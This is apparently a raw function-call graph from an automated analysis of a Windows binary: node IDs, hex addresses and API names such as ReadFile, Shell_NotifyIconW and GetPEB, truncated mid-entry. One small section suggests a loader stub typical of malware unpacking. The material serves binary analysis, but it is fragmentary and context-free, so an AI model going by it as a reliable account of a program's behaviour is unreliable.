95174 37e6f8 95167->95174 95168 37e91a 95188 3827ec 26 API calls pre_c_initialization 95168->95188 95173->95167 95175 37e727 95174->95175 95178 37e70a ___scrt_fastfail 95174->95178 95189 37e96c LeaveCriticalSection __fread_nolock 95175->95189 95176 37e717 95262 37f2d9 20 API calls _abort 95176->95262 95178->95175 95178->95176 95186 37e76a __fread_nolock 95178->95186 95180 37e886 ___scrt_fastfail 95265 37f2d9 20 API calls _abort 95180->95265 95184 37e71c 95263 3827ec 26 API calls pre_c_initialization 95184->95263 95186->95175 95186->95180 95190 37d955 95186->95190 95197 388d45 95186->95197 95264 37cf78 26 API calls 4 library calls 95186->95264 95187->95168 95188->95162 95189->95162 95191 37d976 95190->95191 95192 37d961 95190->95192 95191->95186 95266 37f2d9 20 API calls _abort 95192->95266 95194 37d966 95267 3827ec 26 API calls pre_c_initialization 95194->95267 95196 37d971 95196->95186 95198 388d6f 95197->95198 95199 388d57 95197->95199 95201 3890d9 95198->95201 95206 388db4 95198->95206 95277 37f2c6 20 API calls _abort 95199->95277 95293 37f2c6 20 API calls _abort 95201->95293 95202 388d5c 95278 37f2d9 20 API calls _abort 95202->95278 95205 3890de 95294 37f2d9 20 API calls _abort 95205->95294 95207 388dbf 95206->95207 95208 388d64 95206->95208 95214 388def 95206->95214 95279 37f2c6 20 API calls _abort 95207->95279 95208->95186 95211 388dcc 95295 3827ec 26 API calls pre_c_initialization 95211->95295 95212 388dc4 95280 37f2d9 20 API calls _abort 95212->95280 95216 388e08 95214->95216 95217 388e4a 95214->95217 95218 388e2e 95214->95218 95216->95218 95220 388e15 95216->95220 95284 383820 21 API calls 2 library calls 95217->95284 95281 37f2c6 20 API calls _abort 95218->95281 95268 38f89b 95220->95268 95222 388e33 95282 37f2d9 20 API calls _abort 95222->95282 95225 388e61 95228 3829c8 _free 20 API calls 95225->95228 95226 388fb3 95229 389029 95226->95229 95233 388fcc GetConsoleMode 95226->95233 95227 388e3a 95283 3827ec 26 API calls pre_c_initialization 95227->95283 95231 388e6a 95228->95231 95232 38902d ReadFile 95229->95232 95234 3829c8 _free 20 API calls 95231->95234 95235 3890a1 GetLastError 95232->95235 95236 389047 95232->95236 95233->95229 95237 388fdd 95233->95237 95238 388e71 95234->95238 95239 3890ae 95235->95239 95240 389005 95235->95240 95236->95235 95241 38901e 95236->95241 95237->95232 95242 388fe3 ReadConsoleW 95237->95242 95243 388e7b 95238->95243 95244 388e96 95238->95244 95291 37f2d9 20 API calls _abort 95239->95291 95259 388e45 __fread_nolock 95240->95259 95288 37f2a3 20 API calls 2 library calls 95240->95288 95255 38906c 95241->95255 95256 389083 95241->95256 95241->95259 95242->95241 95247 388fff GetLastError 95242->95247 95285 37f2d9 20 API calls _abort 95243->95285 95287 389424 28 API calls __fread_nolock 95244->95287 95247->95240 95248 3829c8 _free 20 API calls 95248->95208 95250 3890b3 95292 37f2c6 20 API calls _abort 95250->95292 95252 388e80 95286 37f2c6 20 API calls _abort 95252->95286 95289 388a61 31 API calls 3 library calls 95255->95289 95258 38909a 95256->95258 95256->95259 95290 3888a1 29 API calls __fread_nolock 95258->95290 95259->95248 95261 38909f 95261->95259 95262->95184 95263->95175 95264->95186 95265->95184 95266->95194 95267->95196 95269 38f8a8 95268->95269 95271 38f8b5 95268->95271 95296 37f2d9 20 API calls _abort 95269->95296 95274 38f8c1 95271->95274 95297 37f2d9 20 API calls _abort 95271->95297 95273 38f8ad 95273->95226 95274->95226 95275 38f8e2 95298 3827ec 26 API calls pre_c_initialization 95275->95298 95277->95202 95278->95208 95279->95212 95280->95211 95281->95222 95282->95227 95283->95259 95284->95225 95285->95252 95286->95259 95287->95220 95288->95259 95289->95259 95290->95261 95291->95250 95292->95259 95293->95205 95294->95211 95295->95208 95296->95273 95297->95275 95298->95273 95302 37e4e8 95299->95302 95301 3c275d 95301->95052 95305 37e469 95302->95305 95304 37e505 95304->95301 95306 37e478 95305->95306 95308 37e48c 95305->95308 95313 37f2d9 20 API calls _abort 95306->95313 95312 37e488 __alldvrm 95308->95312 95315 38333f 11 API calls 2 library calls 95308->95315 95309 37e47d 95314 3827ec 26 API calls pre_c_initialization 95309->95314 95312->95304 95313->95309 95314->95312 95315->95312 95321 3c2e7a 95316->95321 95317 3550f5 40 API calls 95317->95321 95318 3c2d3b 95318->94895 95318->94912 95319 3c28fe 27 API calls 95319->95321 95320 35511f 64 API calls 95320->95321 95321->95317 95321->95318 95321->95319 95321->95320 95323 3c22e7 95322->95323 95324 3c22d9 95322->95324 95326 3c232c 95323->95326 95327 37e5eb 29 API calls 95323->95327 95336 3c22f0 95323->95336 95325 37e5eb 29 API calls 95324->95325 95325->95323 95351 3c2557 95326->95351 95328 3c2311 95327->95328 95328->95326 95330 3c231a 95328->95330 95334 37e678 67 API calls 95330->95334 95330->95336 95331 3c2370 95332 3c2374 95331->95332 95333 3c2395 95331->95333 95338 37e678 67 API calls 95332->95338 95342 3c2381 95332->95342 95355 3c2171 95333->95355 95334->95336 95336->94912 95337 3c239d 95340 3c23c3 95337->95340 95341 3c23a3 95337->95341 95338->95342 95339 37e678 67 API calls 95339->95336 95362 3c23f3 95340->95362 95344 3c23b0 95341->95344 95345 37e678 67 API calls 95341->95345 95342->95336 95342->95339 95344->95336 95346 37e678 67 API calls 95344->95346 95345->95344 95346->95336 95347 3c23de 95347->95336 95350 37e678 67 API calls 95347->95350 95348 3c23ca 95348->95347 95370 37e678 95348->95370 95350->95336 95352 3c257c 95351->95352 95353 3c2565 __fread_nolock 95351->95353 95354 37e8c4 __fread_nolock 40 API calls 95352->95354 95353->95331 95354->95353 95356 37ea0c ___std_exception_copy 21 API calls 95355->95356 95357 3c217f 95356->95357 95358 37ea0c ___std_exception_copy 21 API calls 95357->95358 95359 3c2190 95358->95359 95360 37ea0c ___std_exception_copy 21 API calls 95359->95360 95361 3c219c 95360->95361 95361->95337 95366 3c2408 95362->95366 95363 3c24c0 95387 3c2724 95363->95387 95365 3c21cc 40 API calls 95365->95366 95366->95363 95366->95365 95369 3c24c7 95366->95369 95383 3c2606 95366->95383 95391 3c2269 40 API calls 95366->95391 95369->95348 95371 37e684 BuildCatchObjectHelperInternal 95370->95371 95372 37e695 95371->95372 95373 37e6aa 95371->95373 95465 37f2d9 20 API calls _abort 95372->95465 95382 37e6a5 __fread_nolock 95373->95382 95448 37918d EnterCriticalSection 95373->95448 95376 37e69a 95466 3827ec 26 API calls pre_c_initialization 95376->95466 95378 37e6c6 95449 37e602 95378->95449 95380 37e6d1 95467 37e6ee LeaveCriticalSection __fread_nolock 95380->95467 95382->95347 95384 3c2617 95383->95384 95385 3c261d 95383->95385 95384->95385 95392 3c26d7 95384->95392 95385->95366 95388 3c2742 95387->95388 95389 3c2731 95387->95389 95388->95369 95390 37dbb3 65 API calls 95389->95390 95390->95388 95391->95366 95393 3c2714 95392->95393 95394 3c2703 95392->95394 95393->95384 95396 37dbb3 95394->95396 95397 37dbc1 95396->95397 95398 37dbdd 95396->95398 95397->95398 95399 37dbe3 95397->95399 95400 37dbcd 95397->95400 95398->95393 95405 37d9cc 95399->95405 95408 37f2d9 20 API calls _abort 95400->95408 95403 37dbd2 95409 3827ec 26 API calls pre_c_initialization 95403->95409 95410 37d97b 95405->95410 95407 37d9f0 95407->95398 95408->95403 95409->95398 95411 37d987 BuildCatchObjectHelperInternal 95410->95411 95418 37918d EnterCriticalSection 95411->95418 95413 37d995 95419 37d9f4 95413->95419 95417 37d9b3 __fread_nolock 95417->95407 95418->95413 95427 3849a1 95419->95427 95425 37d9a2 95426 37d9c0 LeaveCriticalSection __fread_nolock 95425->95426 95426->95417 95428 37d955 __fread_nolock 26 API calls 95427->95428 95429 3849b0 95428->95429 95430 38f89b __fread_nolock 26 API calls 95429->95430 95431 3849b6 95430->95431 95432 37da09 95431->95432 95433 383820 _strftime 21 API calls 95431->95433 95436 37da3a 95432->95436 95434 384a15 95433->95434 95435 3829c8 _free 20 API calls 95434->95435 95435->95432 95437 37da24 95436->95437 95439 37da4c 95436->95439 95447 384a56 62 API calls 95437->95447 95438 37da5a 95440 37f2d9 _free 20 API calls 95438->95440 95439->95437 95439->95438 95446 37da85 __fread_nolock 95439->95446 95441 37da5f 95440->95441 95442 3827ec pre_c_initialization 26 API calls 95441->95442 95442->95437 95443 37dc0b 62 API calls 95443->95446 95444 37d955 __fread_nolock 26 API calls 95444->95446 95445 3859be __wsopen_s 62 API calls 95445->95446 95446->95437 95446->95443 95446->95444 95446->95445 95447->95425 95448->95378 95450 37e624 95449->95450 95451 37e60f 95449->95451 95457 37e61f 95450->95457 95468 37dc0b 95450->95468 95493 37f2d9 20 API calls _abort 95451->95493 95454 37e614 95494 3827ec 26 API calls pre_c_initialization 95454->95494 95457->95380 95460 37d955 __fread_nolock 26 API calls 95461 37e646 95460->95461 95478 38862f 95461->95478 95464 3829c8 _free 20 API calls 95464->95457 95465->95376 95466->95382 95467->95382 95469 37dc1f 95468->95469 95470 37dc23 95468->95470 95474 384d7a 95469->95474 95470->95469 95471 37d955 __fread_nolock 26 API calls 95470->95471 95472 37dc43 95471->95472 95495 3859be 95472->95495 95475 384d90 95474->95475 95476 37e640 95474->95476 95475->95476 95477 3829c8 _free 20 API calls 95475->95477 95476->95460 95477->95476 95479 38863e 95478->95479 95484 388653 95478->95484 95618 37f2c6 20 API calls _abort 95479->95618 95481 38868e 95620 37f2c6 20 API calls _abort 95481->95620 95483 388643 95619 37f2d9 20 API calls _abort 95483->95619 95484->95481 95487 38867a 95484->95487 95485 388693 95621 37f2d9 20 API calls _abort 95485->95621 95615 388607 95487->95615 95490 38869b 95622 3827ec 26 API calls pre_c_initialization 95490->95622 95491 37e64c 95491->95457 95491->95464 95493->95454 95494->95457 95496 3859ca BuildCatchObjectHelperInternal 95495->95496 95497 3859ea 95496->95497 95498 3859d2 95496->95498 95500 385a88 95497->95500 95505 385a1f 95497->95505 95574 37f2c6 20 API calls _abort 95498->95574 95579 37f2c6 20 API calls _abort 95500->95579 95501 3859d7 95575 37f2d9 20 API calls _abort 95501->95575 95504 385a8d 95580 37f2d9 20 API calls _abort 95504->95580 95520 385147 EnterCriticalSection 95505->95520 95506 3859df __fread_nolock 95506->95469 95509 385a95 95581 3827ec 26 API calls pre_c_initialization 95509->95581 95510 385a25 95512 385a41 95510->95512 95513 385a56 95510->95513 95576 37f2d9 20 API calls _abort 95512->95576 95521 385aa9 95513->95521 95516 385a46 95577 37f2c6 20 API calls _abort 95516->95577 95517 385a51 95578 385a80 LeaveCriticalSection __wsopen_s 95517->95578 95520->95510 95522 385ad7 95521->95522 95560 385ad0 95521->95560 95523 385afa 95522->95523 95524 385adb 95522->95524 95528 385b4b 95523->95528 95529 385b2e 95523->95529 95589 37f2c6 20 API calls _abort 95524->95589 95527 385ae0 95590 37f2d9 20 API calls _abort 95527->95590 95532 385b61 95528->95532 95595 389424 28 API calls __fread_nolock 95528->95595 95592 37f2c6 20 API calls _abort 95529->95592 95530 385cb1 95530->95517 95582 38564e 95532->95582 95534 385ae7 95537 385b33 95593 37f2d9 20 API calls _abort 95537->95593 95606 370a8c 95560->95606 95574->95501 95575->95506 95576->95516 95577->95517 95578->95506 95579->95504 95580->95509 95581->95506 95583 38f89b __fread_nolock 26 API calls 95582->95583 95589->95527 95590->95534 95592->95537 95595->95532 95607 370a97 IsProcessorFeaturePresent 95606->95607 95608 370a95 95606->95608 95610 370c5d 95607->95610 95608->95530 95614 370c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95610->95614 95612 370d40 95612->95530 95614->95612 95623 388585 95615->95623 95618->95483 95619->95491 95620->95485 95621->95490 95622->95491 95624 388591 BuildCatchObjectHelperInternal 95623->95624 95634 385147 EnterCriticalSection 95624->95634 95626 38859f 95627 3885d1 95626->95627 95628 3885c6 95626->95628 95650 37f2d9 20 API calls _abort 95627->95650 95635 3886ae 95628->95635 95631 3885cc 95651 3885fb LeaveCriticalSection __wsopen_s 95631->95651 95633 3885ee __fread_nolock 95634->95626 95652 3853c4 95635->95652 95650->95631 95651->95633 95653 3853d1 95652->95653 95657 3853e6 95652->95657 95667 37f2c6 20 API calls _abort 95653->95667 95672 3890fa 95673 38911f 95672->95673 95674 389107 95672->95674 95678 38917a 95673->95678 95686 389117 95673->95686 95724 38fdc4 21 API calls 2 library calls 95673->95724 95722 37f2d9 20 API calls _abort 95674->95722 95676 38910c 95723 3827ec 26 API calls pre_c_initialization 95676->95723 95680 37d955 __fread_nolock 26 API calls 95678->95680 95681 389192 95680->95681 95692 388c32 95681->95692 95683 389199 95684 37d955 __fread_nolock 26 API calls 95683->95684 95683->95686 95685 3891c5 95684->95685 95685->95686 95687 37d955 __fread_nolock 26 API calls 95685->95687 95688 3891d3 95687->95688 95688->95686 95689 37d955 __fread_nolock 26 API calls 95688->95689 95690 3891e3 95689->95690 95691 37d955 __fread_nolock 26 API calls 95690->95691 95691->95686 95693 388c3e BuildCatchObjectHelperInternal 95692->95693 95694 388c5e 95693->95694 95695 388c46 95693->95695 95697 388d24 95694->95697 95702 388c97 95694->95702 95726 37f2c6 20 API calls _abort 95695->95726 95733 37f2c6 20 API calls _abort 95697->95733 95699 388c4b 95727 37f2d9 20 API calls _abort 95699->95727 95700 388d29 95734 37f2d9 20 API calls _abort 95700->95734 95704 388cbb 95702->95704 95705 388ca6 95702->95705 95725 385147 EnterCriticalSection 95704->95725 95728 37f2c6 20 API calls _abort 95705->95728 95707 388cb3 95735 3827ec 26 API calls pre_c_initialization 95707->95735 95709 388cc1 95712 388cdd 95709->95712 95713 388cf2 95709->95713 95710 388cab 95729 37f2d9 20 API calls _abort 95710->95729 95730 37f2d9 20 API calls _abort 95712->95730 95717 388d45 __fread_nolock 38 API calls 95713->95717 95716 388c53 __fread_nolock 95716->95683 95719 388ced 95717->95719 95718 388ce2 95731 37f2c6 20 API calls _abort 95718->95731 95732 388d1c LeaveCriticalSection __wsopen_s 95719->95732 95722->95676 95723->95686 95724->95678 95725->95709 95726->95699 95727->95716 95728->95710 95729->95707 95730->95718 95731->95719 95732->95716 95733->95700 95734->95707 95735->95716 95736 353156 95739 353170 95736->95739 95740 353187 95739->95740 95741 35318c 95740->95741 95742 3531eb 95740->95742 95783 3531e9 95740->95783 95743 353265 PostQuitMessage 95741->95743 95744 353199 95741->95744 95746 392dfb 95742->95746 95747 3531f1 95742->95747 95779 35316a 95743->95779 95749 3531a4 95744->95749 95750 392e7c 95744->95750 95745 3531d0 DefWindowProcW 95745->95779 95795 3518e2 10 API calls 95746->95795 95751 35321d SetTimer RegisterWindowMessageW 95747->95751 95752 3531f8 95747->95752 95756 392e68 95749->95756 95757 3531ae 95749->95757 95809 3bbf30 34 API calls ___scrt_fastfail 95750->95809 95758 353246 CreatePopupMenu 95751->95758 95751->95779 95753 353201 KillTimer 95752->95753 95754 392d9c 95752->95754 95791 3530f2 Shell_NotifyIconW ___scrt_fastfail 95753->95791 95766 392da1 95754->95766 95767 392dd7 MoveWindow 95754->95767 95755 392e1c 95796 36e499 42 API calls 95755->95796 95784 3bc161 95756->95784 95763 392e4d 95757->95763 95764 3531b9 95757->95764 95758->95779 95763->95745 95808 3b0ad7 22 API calls 95763->95808 95769 3531c4 95764->95769 95770 353253 95764->95770 95765 392e8e 95765->95745 95765->95779 95771 392da7 95766->95771 95772 392dc6 SetFocus 95766->95772 95767->95779 95768 353214 95792 353c50 DeleteObject DestroyWindow 95768->95792 95769->95745 95797 3530f2 Shell_NotifyIconW ___scrt_fastfail 95769->95797 95793 35326f 44 API calls ___scrt_fastfail 95770->95793 95771->95769 95776 392db0 95771->95776 95772->95779 95794 3518e2 10 API calls 95776->95794 95777 353263 95777->95779 95781 392e41 95798 353837 95781->95798 95783->95745 95785 3bc276 95784->95785 95786 3bc179 ___scrt_fastfail 95784->95786 95785->95779 95810 353923 95786->95810 95788 3bc25f KillTimer SetTimer 95788->95785 95789 3bc1a0 95789->95788 95790 3bc251 Shell_NotifyIconW 95789->95790 95790->95788 95791->95768 95792->95779 95793->95777 95794->95779 95795->95755 95796->95769 95797->95781 95799 353862 ___scrt_fastfail 95798->95799 95881 354212 95799->95881 95802 3538e8 95804 353906 Shell_NotifyIconW 95802->95804 95805 393386 Shell_NotifyIconW 95802->95805 95806 353923 24 API calls 95804->95806 95807 35391c 95806->95807 95807->95783 95808->95783 95809->95765 95811 35393f 95810->95811 95830 353a13 95810->95830 95832 356270 95811->95832 95814 393393 LoadStringW 95818 3933ad 95814->95818 95815 35395a 95816 356b57 22 API calls 95815->95816 95817 35396f 95816->95817 95819 3933c9 95817->95819 95820 35397c 95817->95820 95821 35a8c7 22 API calls 95818->95821 95825 353994 ___scrt_fastfail 95818->95825 95823 356350 22 API calls 95819->95823 95820->95818 95822 353986 95820->95822 95821->95825 95837 356350 95822->95837 95826 3933d7 95823->95826 95827 3539f9 Shell_NotifyIconW 95825->95827 95826->95825 95846 3533c6 95826->95846 95827->95830 95829 3933f9 95831 3533c6 22 API calls 95829->95831 95830->95789 95831->95825 95833 36fe0b 22 API calls 95832->95833 95834 356295 95833->95834 95835 36fddb 22 API calls 95834->95835 95836 35394d 95835->95836 95836->95814 95836->95815 95838 356362 95837->95838 95839 394a51 95837->95839 95855 356373 95838->95855 95865 354a88 22 API calls __fread_nolock 95839->95865 95842 394a5b 95844 394a67 95842->95844 95845 35a8c7 22 API calls 95842->95845 95843 35636e 95843->95825 95845->95844 95847 3930bb 95846->95847 95848 3533dd 95846->95848 95850 36fddb 22 API calls 95847->95850 95871 3533ee 95848->95871 95852 3930c5 _wcslen 95850->95852 95851 3533e8 95851->95829 95853 36fe0b 22 API calls 95852->95853 95854 3930fe __fread_nolock 95853->95854 95857 356382 95855->95857 95862 3563b6 __fread_nolock 95855->95862 95856 394a82 95859 36fddb 22 API calls 95856->95859 95857->95856 95858 3563a9 95857->95858 95857->95862 95866 35a587 95858->95866 95861 394a91 95859->95861 95863 36fe0b 22 API calls 95861->95863 95862->95843 95864 394ac5 __fread_nolock 95863->95864 95865->95842 95867 35a59d 95866->95867 95870 35a598 __fread_nolock 95866->95870 95868 39f80f 95867->95868 95869 36fe0b 22 API calls 95867->95869 95869->95870 95870->95862 95872 3533fe _wcslen 95871->95872 95873 39311d 95872->95873 95874 353411 95872->95874 95876 36fddb 22 API calls 95873->95876 95875 35a587 22 API calls 95874->95875 95877 35341e __fread_nolock 95875->95877 95878 393127 95876->95878 95877->95851 95879 36fe0b 22 API calls 95878->95879 95880 393157 __fread_nolock 95879->95880 95882 3538b7 95881->95882 95883 3935a4 95881->95883 95882->95802 95885 3bc874 42 API calls _strftime 95882->95885 95883->95882 95884 3935ad DestroyIcon 95883->95884 95884->95882 95885->95802 95886 11423b0 95900 1140000 95886->95900 95888 1142480 95903 11422a0 95888->95903 95906 11434b0 GetPEB 95900->95906 95902 114068b 95902->95888 95904 11422a9 Sleep 95903->95904 95905 11422b7 95904->95905 95907 11434da 95906->95907 95907->95902 95908 35df10 95911 35b710 95908->95911 95912 35b72b 95911->95912 95913 3a00f8 95912->95913 95914 3a0146 95912->95914 95940 35b750 95912->95940 95917 3a0102 95913->95917 95920 3a010f 95913->95920 95913->95940 95977 3d58a2 239 API calls 2 library calls 95914->95977 95975 3d5d33 239 API calls 95917->95975 95934 35ba20 95920->95934 95976 3d61d0 239 API calls 2 library calls 95920->95976 95923 36d336 40 API calls 95923->95940 95924 3a03d9 95924->95924 95926 35bbe0 40 API calls 95926->95940 95929 35ba4e 95930 3a0322 95980 3d5c0c 82 API calls 95930->95980 95934->95929 95981 3c359c 82 API calls __wsopen_s 95934->95981 95939 35a8c7 22 API calls 95939->95940 95940->95923 95940->95926 95940->95929 95940->95930 95940->95934 95940->95939 95942 35ec40 95940->95942 95966 35a81b 41 API calls 95940->95966 95967 36d2f0 40 API calls 95940->95967 95968 36a01b 239 API calls 95940->95968 95969 370242 5 API calls __Init_thread_wait 95940->95969 95970 36edcd 22 API calls 95940->95970 95971 3700a3 29 API calls __onexit 95940->95971 95972 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95940->95972 95973 36ee53 82 API calls 95940->95973 95974 36e5ca 239 API calls 95940->95974 95978 35aceb 23 API calls ISource 95940->95978 95979 3af6bf 23 API calls 95940->95979 95945 35ec76 ISource 95942->95945 95943 36fddb 22 API calls 95943->95945 95944 370242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95944->95945 95945->95943 95945->95944 95946 35fef7 95945->95946 95949 3a4b0b 95945->95949 95950 35a8c7 22 API calls 95945->95950 95951 3a4600 95945->95951 95957 35fbe3 95945->95957 95958 35a961 22 API calls 95945->95958 95959 35ed9d ISource 95945->95959 95961 3700a3 29 API calls pre_c_initialization 95945->95961 95963 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95945->95963 95964 3a4beb 95945->95964 95965 35f3ae ISource 95945->95965 95982 3601e0 239 API calls 2 library calls 95945->95982 95983 3606a0 41 API calls ISource 95945->95983 95954 35a8c7 22 API calls 95946->95954 95946->95959 95985 3c359c 82 API calls __wsopen_s 95949->95985 95950->95945 95956 35a8c7 22 API calls 95951->95956 95951->95959 95954->95959 95956->95959 95957->95959 95960 3a4bdc 95957->95960 95957->95965 95958->95945 95959->95940 95986 3c359c 82 API calls __wsopen_s 95960->95986 95961->95945 95963->95945 95987 3c359c 82 API calls __wsopen_s 95964->95987 95965->95959 95984 3c359c 82 API calls __wsopen_s 95965->95984 95966->95940 95967->95940 95968->95940 95969->95940 95970->95940 95971->95940 95972->95940 95973->95940 95974->95940 95975->95920 95976->95934 95977->95940 95978->95940 95979->95940 95980->95934 95981->95924 95982->95945 95983->95945 95984->95959 95985->95959 95986->95964 95987->95959 95988 351033 95993 354c91 95988->95993 95992 351042 95994 35a961 22 API calls 95993->95994 95995 354cff 95994->95995 96001 353af0 95995->96001 95997 354d9c 95998 351038 95997->95998 96004 3551f7 22 API calls __fread_nolock 95997->96004 96000 3700a3 29 API calls __onexit 95998->96000 96000->95992 96005 353b1c 96001->96005 96004->95997 96006 353b0f 96005->96006 96007 353b29 96005->96007 96006->95997 96007->96006 96008 353b30 RegOpenKeyExW 96007->96008 96008->96006 96009 353b4a RegQueryValueExW 96008->96009 96010 353b80 RegCloseKey 96009->96010 96011 353b6b 96009->96011 96010->96006 96011->96010 96012 35dddc 96013 35b710 239 API calls 96012->96013 96014 35ddea 96013->96014 96015 35f7bf 96016 35fcb6 96015->96016 96017 35f7d3 96015->96017 96108 35aceb 23 API calls ISource 96016->96108 96019 35fcc2 96017->96019 96020 36fddb 22 API calls 96017->96020 96109 35aceb 23 API calls ISource 96019->96109 96022 35f7e5 96020->96022 96022->96019 96023 35fd3d 96022->96023 96024 35f83e 96022->96024 96110 3c1155 22 API calls 96023->96110 96049 35ed9d ISource 96024->96049 96050 361310 96024->96050 96027 36fddb 22 API calls 96047 35ec76 ISource 96027->96047 96028 35fef7 96036 35a8c7 22 API calls 96028->96036 96028->96049 96031 3a4b0b 96112 3c359c 82 API calls __wsopen_s 96031->96112 96032 35a8c7 22 API calls 96032->96047 96033 3a4600 96038 35a8c7 22 API calls 96033->96038 96033->96049 96036->96049 96038->96049 96039 370242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96039->96047 96040 35fbe3 96042 3a4bdc 96040->96042 96048 35f3ae ISource 96040->96048 96040->96049 96041 35a961 22 API calls 96041->96047 96113 3c359c 82 API calls __wsopen_s 96042->96113 96043 3700a3 29 API calls pre_c_initialization 96043->96047 96045 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96045->96047 96046 3a4beb 96114 3c359c 82 API calls __wsopen_s 96046->96114 96047->96027 96047->96028 96047->96031 96047->96032 96047->96033 96047->96039 96047->96040 96047->96041 96047->96043 96047->96045 96047->96046 96047->96048 96047->96049 96106 3601e0 239 API calls 2 library calls 96047->96106 96107 3606a0 41 API calls ISource 96047->96107 96048->96049 96111 3c359c 82 API calls __wsopen_s 96048->96111 96051 361376 96050->96051 96052 3617b0 96050->96052 96053 361390 96051->96053 96054 3a6331 96051->96054 96264 370242 5 API calls __Init_thread_wait 96052->96264 96056 361940 9 API calls 96053->96056 96269 3d709c 239 API calls 96054->96269 96059 3613a0 96056->96059 96058 3617ba 96061 359cb3 22 API calls 96058->96061 96066 3617fb 96058->96066 96062 361940 9 API calls 96059->96062 96060 3a633d 96060->96047 96063 3617d4 96061->96063 96064 3613b6 96062->96064 96265 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96063->96265 96064->96066 96067 3613ec 96064->96067 96065 3a6346 96270 3c359c 82 API calls __wsopen_s 96065->96270 96066->96065 96068 36182c 96066->96068 96067->96065 96090 361408 __fread_nolock 96067->96090 96266 35aceb 23 API calls ISource 96068->96266 96071 361839 96267 36d217 239 API calls 96071->96267 96074 3a636e 96271 3c359c 82 API calls __wsopen_s 96074->96271 96075 36152f 96077 36153c 96075->96077 96078 3a63d1 96075->96078 96080 361940 9 API calls 96077->96080 96273 3d5745 54 API calls _wcslen 96078->96273 96081 361549 96080->96081 96087 361940 9 API calls 96081->96087 96097 3615c7 ISource 96081->96097 96082 36fddb 22 API calls 96082->96090 96083 361872 96268 36faeb 23 API calls 96083->96268 96084 36fe0b 22 API calls 96084->96090 96086 36171d 96086->96047 96092 361563 96087->96092 96089 35ec40 239 API calls 96089->96090 96090->96071 96090->96074 96090->96075 96090->96082 96090->96084 96090->96089 96094 3a63b2 96090->96094 96090->96097 96092->96097 96098 35a8c7 22 API calls 96092->96098 96272 3c359c 82 API calls __wsopen_s 96094->96272 96096 36167b ISource 96096->96086 96263 36ce17 22 API calls ISource 96096->96263 96097->96083 96097->96096 96103 354f39 68 API calls 96097->96103 96115 361940 96097->96115 96125 3cf0ec 96097->96125 96134 3bd4ce 96097->96134 96137 3d959f 96097->96137 96140 3d958b 96097->96140 96143 3dd482 96097->96143 96183 3c6ef1 96097->96183 96274 3c359c 82 API calls __wsopen_s 96097->96274 96098->96097 96103->96097 96106->96047 96107->96047 96108->96019 96109->96023 96110->96049 96111->96049 96112->96049 96113->96046 96114->96049 96116 361981 96115->96116 96123 36195d 96115->96123 96275 370242 5 API calls __Init_thread_wait 96116->96275 96117 36196e 96117->96097 96120 36198b 96120->96123 96276 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96120->96276 96121 368727 96121->96117 96278 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96121->96278 96123->96117 96277 370242 5 API calls __Init_thread_wait 96123->96277 96279 357510 96125->96279 96129 3cf136 96130 35ec40 239 API calls 96129->96130 96132 3cf15b 96129->96132 96130->96132 96133 3cf15f 96132->96133 96330 359c6e 22 API calls 96132->96330 96133->96097 96344 3bdbbe lstrlenW 96134->96344 96349 3d7f59 96137->96349 96139 3d95af 96139->96097 96141 3d7f59 120 API calls 96140->96141 96142 3d959b 96141->96142 96142->96097 96455 3c1e96 96143->96455 96145 3dd49d 96146 3dd4ee 96145->96146 96147 3dd4b1 96145->96147 96150 3dd4fc 96146->96150 96486 35b567 39 API calls 96146->96486 96485 359c6e 22 API calls 96147->96485 96151 3dd548 96150->96151 96152 3dd51f 96150->96152 96154 3dd600 96151->96154 96157 3dd55a 96151->96157 96487 359c6e 22 API calls 96152->96487 96459 36f1d8 96154->96459 96156 3dd4be 96156->96097 96159 3dd59d 96157->96159 96160 3dd55f 96157->96160 96162 36fe0b 22 API calls 96159->96162 96163 356270 22 API calls 96160->96163 96169 3dd5a3 96162->96169 96165 3dd572 96163->96165 96164 3dd619 96166 356270 22 API calls 96164->96166 96488 356e90 96165->96488 96168 3dd623 96166->96168 96173 3dd637 96168->96173 96174 3dd630 96168->96174 96169->96169 96170 356270 22 API calls 96169->96170 96175 3dd5dd 96170->96175 96171 3dd582 96500 3562b5 22 API calls 96171->96500 96502 356e14 24 API calls 96173->96502 96477 356d9e MultiByteToWideChar 96174->96477 96177 356e90 22 API calls 96175->96177 96180 3dd5ea 96177->96180 96179 3dd635 96503 3562b5 22 API calls 96179->96503 96501 3562b5 22 API calls 96180->96501 96184 35a961 22 API calls 96183->96184 96185 3c6f1d 96184->96185 96186 35a961 22 API calls 96185->96186 96187 3c6f26 96186->96187 96188 3c6f3a 96187->96188 96659 35b567 39 API calls 96187->96659 96190 357510 53 API calls 96188->96190 96191 3c6f57 _wcslen 96190->96191 96192 3c6fbc 96191->96192 96193 3c70bf 96191->96193 96203 3c70e9 96191->96203 96194 357510 53 API calls 96192->96194 96195 354ecb 94 API calls 96193->96195 96196 3c6fc8 96194->96196 96197 3c70d0 96195->96197 96201 35a8c7 22 API calls 96196->96201 96205 3c6fdb 96196->96205 96198 3c70e5 96197->96198 96199 354ecb 94 API calls 96197->96199 96200 35a961 22 API calls 96198->96200 96198->96203 96199->96198 96202 3c711a 96200->96202 96201->96205 96204 35a961 22 API calls 96202->96204 96203->96097 96209 3c7126 96204->96209 96206 3c7027 96205->96206 96207 3c7005 96205->96207 96210 35a8c7 22 API calls 96205->96210 96208 357510 53 API calls 96206->96208 96211 3533c6 22 API calls 96207->96211 96212 3c7034 96208->96212 96213 35a961 22 API calls 96209->96213 96210->96207 96214 3c700f 96211->96214 96215 3c703d 96212->96215 96216 3c7047 96212->96216 96217 3c712f 96213->96217 96218 357510 53 API calls 96214->96218 96219 35a8c7 22 API calls 96215->96219 96660 3be199 GetFileAttributesW 96216->96660 96221 35a961 22 API calls 96217->96221 96223 3c701b 96218->96223 96219->96216 96222 3c7138 96221->96222 96226 357510 53 API calls 96222->96226 96227 356350 22 API calls 96223->96227 96224 3c7050 96225 